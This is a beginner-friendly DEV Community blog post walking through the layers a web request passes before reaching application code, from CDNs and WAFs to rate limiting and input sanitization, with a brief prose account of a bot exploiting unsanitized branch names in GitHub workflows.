Kishan Agarwal

Posted on Jun 10 • Originally published at cosmoscribe.hashnode.dev

The Journey of a Request: What Happens Before Your Code Even Runs?

#webdev #systemdesign #architecture #software

Okay, before we go into the depths of these concepts, I want to tell you that we will take it easy. I don’t want you to get overwhelmed by the jargon.

We spend hours arguing about which programming language is the fastest, or how to write the most optimized database query. We debate whether Go is better than Rust, or if Node.js can handle the load.

But have you ever thought about the gauntlet a user's request has to run through before it even touches your beautiful code?

Let's break down the layers of the modern web infrastructure. We have CDNs, WAFs, Load Balancers, API Gateways, Internal Reverse Proxies, Rate Limiting, and Input Sanitization.

Sounds like a massive headache, right? Let's take them one by one.

Content Delivery Network (CDN): The Franchise Model

The formal definition: A CDN is a network of interconnected servers that speeds up webpage loading for data-heavy applications.

Sounds boring. Let me explain it in simple words.

Think of McDonald’s. If McDonald's only cooked burgers in the US, would you wait a month for your food to arrive in India? Of course not. To expand, they open multiple franchises so you can order from the outlet nearest to your house.

A CDN does exactly this for your application data. When you have users from all over the globe, you don't want to serve them from a single server in Virginia. You want to get as close to them as possible. Services like Cloudflare or AWS CloudFront act as your franchises.

When a user requests an image, a video, or even a static HTML file, the CDN fetches it from your main server once, caches it, and then directly serves it to anyone else in that region who asks for it.

WAF (Web Application Firewall): The Bouncer at the Door

A WAF protects web applications by filtering and monitoring HTTP traffic. It stops attacks like Cross-Site Scripting (XSS) and SQL Injection.

Think of it this way: Do you sleep with your front door wide open? Absolutely not. So why should the ports of your application remain open to anyone on the internet?

A WAF is the bouncer securing those doors. We write specific rules that dictate who the gate will open for and who gets turned away. If a request comes in carrying a malicious payload that looks like a database command, the WAF literally slams the door in its face before your server even knows someone knocked.

Load Balancer: The Traffic Cop

A load balancer acts as a "traffic cop" sitting in front of your servers, distributing incoming client requests across a group of backend servers.

This is exactly what it sounds like. Imagine a busy intersection. If everyone tries to go down the same lane, there will be a massive traffic jam. The load balancer looks at your cluster of 10 servers and says, "Okay, Server 1 is busy sweating over a heavy calculation, let's send this new request to Server 2."

It maximizes speed and ensures high availability. If one server crashes and burns, the traffic cop just routes traffic to the surviving ones. The user never notices a thing.

API Gateway vs. Internal Reverse Proxy: The Watchman and the Guide

If you read my last blog on proxies, you know what a Reverse Proxy is. But wait, if we have an API Gateway, why do we need a reverse proxy? Let's clear the confusion.

The API Gateway (The Watchman): This is the security guard at the main gate of your residential society. They check your ID, verify if you are authorized to be there (Authentication/Authorization), check if you paid your subscription, and make sure you aren't trying to sneak in.

The Internal Reverse Proxy (The Guide): Once the watchman lets you in, you are inside a massive cluster of buildings (microservices). The Load Balancer points to the Reverse Proxy, and the Reverse Proxy looks at your request and says, "Ah, you want user data? Go to building A. You want payment history? Go to building B."

Rate Limiting: Preventing the Stampede

Rate limiting is a system design technique that restricts the number of requests a user can make to a service within a specific timeframe.

Why do we do this? Because someone out there might try to overwhelm our services by sending 10,000 requests per second. If we don't stop them, our servers will spend all their CPU power serving this one malicious user, while legitimate users wait in an endless queue. This is known as a Denial of Service (DoS) attack.

Rate limiting is our safety valve. "You've had your 100 requests for this minute, buddy. Come back later."

The Real Engineering Part: How do we actually do this? Usually, we just keep a rapid-fire counter in a fast, in-memory database like Redis. Every time a user makes a request, we increment their counter. If the counter hits 101, we return an HTTP 429 (Too Many Requests) error. Simple, but life-saving.

Input Sanitization: The Most Overlooked Lifesaver

Believe me, this is the most overlooked layer, but it is the absolute most critical one.

Users lie. Users will send you malicious scripts pretending to be standard text inputs. If you don't clean (sanitize) that input, your system can be entirely compromised.
hackerbotclaw
What did the bot do? It found repositories with automated workflow files and made Pull Requests where the "branch name" was actually a malicious script. Because the system didn't sanitize the branch name before echoing it out into the terminal, the script executed right there on GitHub's servers. Just like that, the bot gained control.

Never trust user input. Always sanitize.

What's Next?

This was just a bird's-eye view of the gauntlet. In the upcoming articles, we are going to tear each of these layers apart. We will look at the code, write our own rate limiters, and configure our own load balancers.

Happy Exploration!

DEV Community

The Journey of a Request: What Happens Before Your Code Even Runs?

Top comments (0)